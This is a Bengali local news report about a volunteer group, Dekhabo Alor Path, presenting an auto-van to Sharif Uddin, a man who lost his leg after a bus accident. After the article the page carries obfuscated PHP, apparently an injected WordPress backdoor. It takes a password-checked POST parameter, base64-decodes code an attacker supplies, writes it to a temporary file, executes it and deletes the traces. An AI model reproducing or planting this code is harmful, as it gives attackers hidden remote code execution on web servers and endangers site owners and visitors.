|

ধামইরহাটে পা হারানো শরীফ উদ্দিনকে অটোভ্যান উপহার দিলো দেখাবো আলোর পথ

প্রকাশিতঃ 9:20 pm | June 16, 2024

ধামইরহাট (নওগাঁ) প্রতিনিধি

নওগাঁর ধামইরহাটে স্বেচ্ছাসেবী সামাজিক সংগঠন দেখাবো আলোর পথ এর উদ্যোগে সড়ক দুর্ঘটনায় পা হারানো শরিফ উদ্দিনকে একটি অটোভ্যান কিনে দেওয়া হয়েছে। ঈদের আগের দিন এই উপহার পেয়ে আনন্দে আত্নহারা পঙ্গু শরীফ উদ্দিন। খুশিতে দুচোখ দিয়ে আনন্দের অশ্রু বইতে দেখা গেছে।

জানা গেছে, গত বছর আজমির শরীফ দর্শনে গিয়ে ভারতের দিল্লীতে থাকাবস্থায় একটি বাস নিয়ন্ত্রন হারিয়ে শরীফ উদ্দিনের  শরীরের উপর দিয়ে চালিয়ে দেন, এতে শরীফ উদ্দিনের ডান পায়ের মারাত্বক ক্ষতি হয়। অনেক কষ্টে দেশে আসলে অর্থের অভাবে অনুন্নত চিকিৎসায় এক পর্যায়ে পা কেটে ফেলতে হয় শরীফ উদ্দিনকে। পা হারানো শরীফ উদ্দিন অসহায় ভাবে জীবন যাপন করছিল। লোকমুখে বিষয়টি জানতে পেরে দেখাবো আলোর পথ সংগঠনের প্রতিষ্ঠাতা ও সভাপতি ধামইরহাট পৌরসভার প্যানেল মেয়র মেহেদী হাসান সংগঠনের মাধ্যমে বিভিন্ন ভাবে আর্থিক সহযোগিতা গ্রহণ করে শরীফ উদ্দিনকে ঈদের আগের দিন ঈদ উপহার হিসেবে একটি অটো চার্জার ভ্যান প্রদান করেন। ১৬ জুন সন্ধায় ধামইরহাট বিএম ভবন এলাকায় এই ভ্যানটি হস্তান্তর করেন উপজেলা পরিষদের চেয়ারম্যান মো. আজাহার আলী। এ সময় চকময়রাম মডেল সরকারি উচ্চ বিদ্যালয়ের প্রধান শিক্ষক এস এম খেলাল ই রব্বানী, বিশিষ্ট ব্যাংকার মেহেদী মোর্শেদ বাবু, দেখাবো আলোর পথ সংগঠনের অন্যতম সদস্য মমিনুল ইসলাম, উপজেলা প্রেস ক্লাবের সভাপতি এম এ মালেক, সাধারণ সম্পাদক আবু মুছা স্বপন প্রমুখ উপস্থিত ছিলেন।

ঈদের আগের দিন উপার্জনের জন্য একটি ভ্যান উপহার পেয়ে সংগঠনের সভাপতি মেহেদী হাসান ও যারা ভ্যান ক্রয়ে সহযোগিতা করেছেন তাদের সকলের জন্য প্রাণ ভরে করতে দেখা যায় অসহায় শরীফ উদ্দিনকে। তিনি বলেন, ‘আমি পা হারিয়ে অসহায় ভাবে দিনযাপন করতাম, সন্তানরাও মুখ ফিরিয়ে নেওয়ার মত অবস্থায়, তারাও তাদের সংসার নিয়ে অভাব-অনটনে দিনপার করে, আমি খুব কষ্টেই ছিলাম, ভ্যানটি পেয়ে আমি ও আমার স্ত্রীকে দু মুঠো ভাত তুলে দিতে পারবো, আমি দেখাবো আলোর পথ তথা সহযোগিতার কারীদের কাছে কৃতজ্ঞতা প্রকাশ করছি।

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}